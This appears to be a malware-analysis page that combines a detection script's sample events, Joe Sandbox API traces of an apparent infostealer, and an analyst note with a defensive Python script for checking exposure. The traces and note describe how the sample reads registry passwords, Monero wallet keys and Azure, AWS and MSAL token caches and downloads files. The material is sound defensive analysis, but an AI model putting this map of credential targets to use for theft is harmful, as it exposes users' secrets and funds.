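    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'C:\Windows\system32\msiexec.exe /i "C:\Users\user\AppData\Local\Temp\upd.msi" /passive',
     "ParentImage": r"C:\Users\user\Desktop\file.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\mod.dll,Start",
     "ParentImage": r"C:\Users\user\Desktop\file.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Windows\ccmcache\a1\agent.msi" /qn',
     "ParentImage": r"C:\Windows\CCM\CcmExec.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def scan(events: list[dict]) -> list[Finding]:
    return [f for e in events for f in check_event(e)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.evidence}")
```

The rules are hunting leads, not blocking logic: a user double-clicking a downloaded installer also produces msiexec with an MSI under Downloads, so in practice the parent-image condition (an unknown binary running from the user's profile) is the part that separates this sample from ordinary installs, and the directory list should be tuned to the environment.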
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 00126280: InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                            • Part of subcall function 00126280: StrCmpCA.SHLWAPI(?,00F0F920), ref: 00126303
                            • Part of subcall function 00126280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                            • Part of subcall function 00126280: HttpOpenRequestA.WININET(00000000,GET,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00126385
                            • Part of subcall function 00126280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                            • Part of subcall function 00126280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135318
                          • lstrlen.KERNEL32(00000000), ref: 0013532F
                            • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00135364
                          • lstrlen.KERNEL32(00000000), ref: 00135383
                          • lstrlen.KERNEL32(00000000), ref: 001353AE
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: c73f54886aeb21507da27b05ae28b93ae15c8ca7fad9ce740f98612b37dd443d
                          • Instruction ID: 269f331e68198cfd47fa5cd9f26abaafa550362bc64fd7b029aaff13317c7979
                          • Opcode Fuzzy Hash: c73f54886aeb21507da27b05ae28b93ae15c8ca7fad9ce740f98612b37dd443d
                          • Instruction Fuzzy Hash: 01510F70910148EBDB18FF60DD96AED7779AF20301F904068F446AB592EF346B46DBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 4d982bf4d3b308f922b666d25c549c282ca63baea3fb13b8f6bf36a9f7b36e8b
                          • Instruction ID: 7de2fd2e86c5d17bbc2f8f4dbab254f9cf51b0f69487442e0dad483e0d346daf
                          • Opcode Fuzzy Hash: 4d982bf4d3b308f922b666d25c549c282ca63baea3fb13b8f6bf36a9f7b36e8b
                          • Instruction Fuzzy Hash: A1C195B594021DABCB14EF60DC99FEA7378BF64304F1045D8F50AA7241EB70AA85DF91
                          APIs
                            • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 001342EC
                          • lstrcat.KERNEL32(?,00F0F2F0), ref: 0013430B
                          • lstrcat.KERNEL32(?,?), ref: 0013431F
                          • lstrcat.KERNEL32(?,00F0D718), ref: 00134333
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 00138D90: GetFileAttributesA.KERNEL32(00000000,?,00121B54,?,?,0014564C,?,?,00140E1F), ref: 00138D9F
                            • Part of subcall function 00129CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D39
                            • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                            • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                            • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                            • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                            • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                            • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                            • Part of subcall function 001393C0: GlobalAlloc.KERNEL32(00000000,001343DD,001343DD), ref: 001393D3
                          • StrStrA.SHLWAPI(?,00F0F368), ref: 001343F3
                          • GlobalFree.KERNEL32(?), ref: 00134512
                            • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                            • Part of subcall function 00129AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                            • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                            • Part of subcall function 00129AC0: LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 001344A3
                          • StrCmpCA.SHLWAPI(?,001408D1), ref: 001344C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 001344D2
                          • lstrcat.KERNEL32(00000000,?), ref: 001344E5
                          • lstrcat.KERNEL32(00000000,00140FB8), ref: 001344F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 0705ed96aaf2e7a7a5aef9b01260f02c1631f335159510ca71dcb60d4135548e
                          • Instruction ID: 3db1b40002ce6740ad64a7b31d89f2f8d87f8554f3ecac20235d704327b5c5f5
                          • Opcode Fuzzy Hash: 0705ed96aaf2e7a7a5aef9b01260f02c1631f335159510ca71dcb60d4135548e
                          • Instruction Fuzzy Hash: 5F7156B6900218ABCB14EBA4DC89FEE777DAF98300F008598F605A7181DB75EB55CF91
                          APIs
                            • Part of subcall function 001212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001212B4
                            • Part of subcall function 001212A0: RtlAllocateHeap.NTDLL(00000000), ref: 001212BB
                            • Part of subcall function 001212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001212D7
                            • Part of subcall function 001212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001212F5
                            • Part of subcall function 001212A0: RegCloseKey.ADVAPI32(?), ref: 001212FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0012134F
                          • lstrlen.KERNEL32(?), ref: 0012135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00121377
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00F0EC08,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00121465
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                            • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                            • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                            • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                            • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                            • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 001214EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: a9723956ccd5454fff05a43a4ccb5788eb6ff63e69d2f4ab0c04c9274ec054cc
                          • Instruction ID: 021ee87028c974cf3919baefd374edcf7e64eecd5a1c1b98695495c42dee8947
                          • Opcode Fuzzy Hash: a9723956ccd5454fff05a43a4ccb5788eb6ff63e69d2f4ab0c04c9274ec054cc
                          • Instruction Fuzzy Hash: 5F5120B195011967CB15EB60DD92BED737CAF64300F8045D8B64AB2092EF706B89CFA6
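Analyst note (added here; not part of the Joe Sandbox output or of the sample): two functions on this page target stored secrets. The one whose calls appear at 00134DB0 to 00134EE5 (through subcall 00134910) resolves SHGetFolderPathA with CSIDL 0x1C (CSIDL_LOCAL_APPDATA), appends `\.azure\`, `\.aws\` and `\.IdentityService\`, walks each directory with FindFirstFileA/FindNextFileA, filters names with PathMatchSpecA against `*.*` and copies the matches (the `msal.cache` string is the MSAL token cache file). The one whose calls appear at 0012134F to 001214EF reads `wallet_path` from `SOFTWARE\monero-project\monero-core`, appends `.keys` and copies that file before reading and deleting the copy. The Python below is a responder's exposure check for the same locations: it reports which of those files exist on a host, so the blast radius of a run of this sample can be judged. Assumptions that are not in the report: the registry hive is HKEY_CURRENT_USER (the Qt QSettings default; the trace shows only a placeholder handle), `%USERPROFILE%` is checked as a second root because the Azure and AWS CLIs create `.azure` and `.aws` there by default, `fnmatch` stands in for PathMatchSpecA, and the host state in `constructed_host()` is invented for the example. The hard-coded `\Monero\wallet.keys` suffix visible in the trace has no visible base path, so it is not reconstructed here.

```python
"""Exposure check for the credential stores targeted by the two functions
above: the %LOCALAPPDATA%\\.azure, \\.aws and \\.IdentityService directories
(FindFirstFileA / PathMatchSpecA / CopyFileA) and the Monero wallet key file
derived from HKCU\\SOFTWARE\\monero-project\\monero-core\\wallet_path + ".keys".
Host access is injected so the logic also runs against constructed data;
on a Windows host use live_host()."""
import fnmatch
import os
import sys
from dataclasses import dataclass
from typing import Callable, Optional

# Sub-directories the sample appends to the CSIDL_LOCAL_APPDATA (0x1C) path.
CLOUD_CRED_DIRS = (".azure", ".aws", ".IdentityService")
# Registry location of the Monero GUI wallet path; hive assumed to be HKCU.
MONERO_KEY, MONERO_VALUE = r"SOFTWARE\monero-project\monero-core", "wallet_path"


@dataclass
class Host:
    """Minimal host interface: environment, filesystem probes, registry read."""
    env: dict
    exists: Callable[[str], bool]
    listdir: Callable[[str], list]
    reg_read: Callable[[str, str], Optional[str]]


def cloud_credential_files(host: Host, pattern: str = "*") -> list:
    """Files under the targeted directories. The sample filters with "*.*";
    a responder usually wants every file, hence the default "*". fnmatch
    stands in for PathMatchSpecA (assumed close enough for these names)."""
    # The second root is this example's generalisation: the Azure and AWS CLIs
    # create .azure and .aws in %USERPROFILE%, not in %LOCALAPPDATA%.
    roots = [host.env.get("LOCALAPPDATA"), host.env.get("USERPROFILE")]
    hits = []
    for root in filter(None, roots):
        for sub in CLOUD_CRED_DIRS:
            folder = root.rstrip("\\") + "\\" + sub
            if not host.exists(folder):
                continue
            for name in host.listdir(folder):
                # Windows name matching is case-insensitive; emulate it everywhere.
                if fnmatch.fnmatchcase(name.lower(), pattern.lower()):
                    hits.append(folder + "\\" + name)
    return hits


def monero_key_file(host: Host) -> Optional[str]:
    """wallet_path + ".keys", the derivation the trace shows."""
    wallet = host.reg_read(MONERO_KEY, MONERO_VALUE)
    if not wallet:
        return None
    candidate = wallet + ".keys"
    return candidate if host.exists(candidate) else None


def exposure_report(host: Host) -> dict:
    return {
        "cloud_credentials": cloud_credential_files(host),
        "monero_keys": monero_key_file(host),
    }


def live_host() -> Host:
    """Real host access (Windows only, because of winreg)."""
    def reg_read(key: str, value: str) -> Optional[str]:
        import winreg  # only importable on Windows
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key) as k:
                return str(winreg.QueryValueEx(k, value)[0])
        except OSError:
            return None
    return Host(dict(os.environ), os.path.exists, os.listdir, reg_read)


def constructed_host() -> Host:
    """Constructed state for the example: one user with an Azure CLI profile,
    an AWS CLI profile, an MSAL cache and a Monero GUI wallet."""
    dirs = {
        r"C:\Users\user\AppData\Local\.IdentityService": ["msal.cache"],
        r"C:\Users\user\.azure": ["azureProfile.json", "msal_token_cache.bin"],
        r"C:\Users\user\.aws": ["credentials", "config"],
        r"C:\Users\user\Documents\Monero\wallets\main": ["main", "main.keys"],
    }
    files = {d + "\\" + n for d, names in dirs.items() for n in names}
    reg = {(MONERO_KEY, MONERO_VALUE): r"C:\Users\user\Documents\Monero\wallets\main\main"}
    return Host(
        env={"LOCALAPPDATA": r"C:\Users\user\AppData\Local", "USERPROFILE": r"C:\Users\user"},
        exists=lambda p: p in dirs or p in files,
        listdir=lambda p: list(dirs.get(p, [])),
        reg_read=lambda k, v: reg.get((k, v)),
    )


if __name__ == "__main__":
    host = live_host() if sys.platform == "win32" else constructed_host()
    for kind, found in exposure_report(host).items():
        print(kind, found)
```

Running it with `pattern="*.*"` against the constructed host shows why the default is `*`: the AWS CLI's `credentials` and `config` files carry no extension, so a dot-requiring pattern skips exactly the files a responder most wants listed, whatever the sample itself did with them.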
                          APIs
                            • Part of subcall function 001272D0: memset.MSVCRT ref: 00127314
                            • Part of subcall function 001272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0012733A
                            • Part of subcall function 001272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001273B1
                            • Part of subcall function 001272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0012740D
                            • Part of subcall function 001272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00127452
                            • Part of subcall function 001272D0: HeapFree.KERNEL32(00000000), ref: 00127459
                          • lstrcat.KERNEL32(00000000,001417FC), ref: 00127606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00127648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0012765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0012768F
                          • lstrcat.KERNEL32(00000000,00141804), ref: 001276A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 001276D3
                          • lstrcat.KERNEL32(00000000,00141808), ref: 001276ED
                          • task.LIBCPMTD ref: 001276FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: :
                          • API String ID: 3191641157-3653984579
                          • Opcode ID: 97d0bdc029f1aae94bb6fe99f951e514ffac7fd82b3b253ef4cf9e0be93414ea
                          • Instruction ID: a37ef172245dbef9fe750a4b61c4a84c41669a019dbe8005da40fcbf85f3c68a
                          • Opcode Fuzzy Hash: 97d0bdc029f1aae94bb6fe99f951e514ffac7fd82b3b253ef4cf9e0be93414ea
                          • Instruction Fuzzy Hash: 01314D71901519EFCB05EBA4EC99DEF7778AB54302F148118F102B72A0DB74A956CF52
                          APIs
                          • memset.MSVCRT ref: 00127314
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0012733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001273B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0012740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00127452
                          • HeapFree.KERNEL32(00000000), ref: 00127459
                          • task.LIBCPMTD ref: 00127555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: Password
                          • API String ID: 2808661185-3434357891
                          • Opcode ID: 86e5670680de7d1666b00c85cb05f812ec4ee443821f3c6d6c9488c71fa96523
                          • Instruction ID: cf17f8339235d4f38bebfec99031351b383ec0a2e0e9769a64a87869de94d34b
                          • Opcode Fuzzy Hash: 86e5670680de7d1666b00c85cb05f812ec4ee443821f3c6d6c9488c71fa96523
                          • Instruction Fuzzy Hash: 76612BB5D042689BDB24DB50DC51FDAB7B8BF58300F0081E9E689A6181DBB05BD9CFA1
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                            • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                          • InternetOpenA.WININET(00140DF7,00000001,00000000,00000000,00000000), ref: 0012610F
                          • StrCmpCA.SHLWAPI(?,00F0F920), ref: 00126147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0012618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001261B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 001261DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0012620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00126249
                          • InternetCloseHandle.WININET(?), ref: 00126253
                          • InternetCloseHandle.WININET(00000000), ref: 00126260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: d00d2eea2f953230f0b6210072e04ba10b9402bc569b87082a27048c31918f8d
                          • Instruction ID: 54a4bff400b9258f99d4ebd6ae03990c1500969d7c2778ceb082ca4851cb94dc
                          • Opcode Fuzzy Hash: d00d2eea2f953230f0b6210072e04ba10b9402bc569b87082a27048c31918f8d
                          • Instruction Fuzzy Hash: 8E514DB1940218ABDB24DFA0DC45BEE77B8EF44701F108098F605B71C1DBB4AA99CF95
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0012BC9F
                            • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0012BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0012BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0012BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 2dcc440c61a4bb27a00edd5820193b8bdfbdd964a21bfdbc530bad3a55f20226
                          • Instruction ID: 84e16a3618aed68c7a601c4d5dd5e706be810151f16df6711fab3cfaef9c5dcd
                          • Opcode Fuzzy Hash: 2dcc440c61a4bb27a00edd5820193b8bdfbdd964a21bfdbc530bad3a55f20226
                          • Instruction Fuzzy Hash: C1B13E72910118ABDB04FBA0DD96EEE733CAF64301F804568F546B7191EF746E49CBA2
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
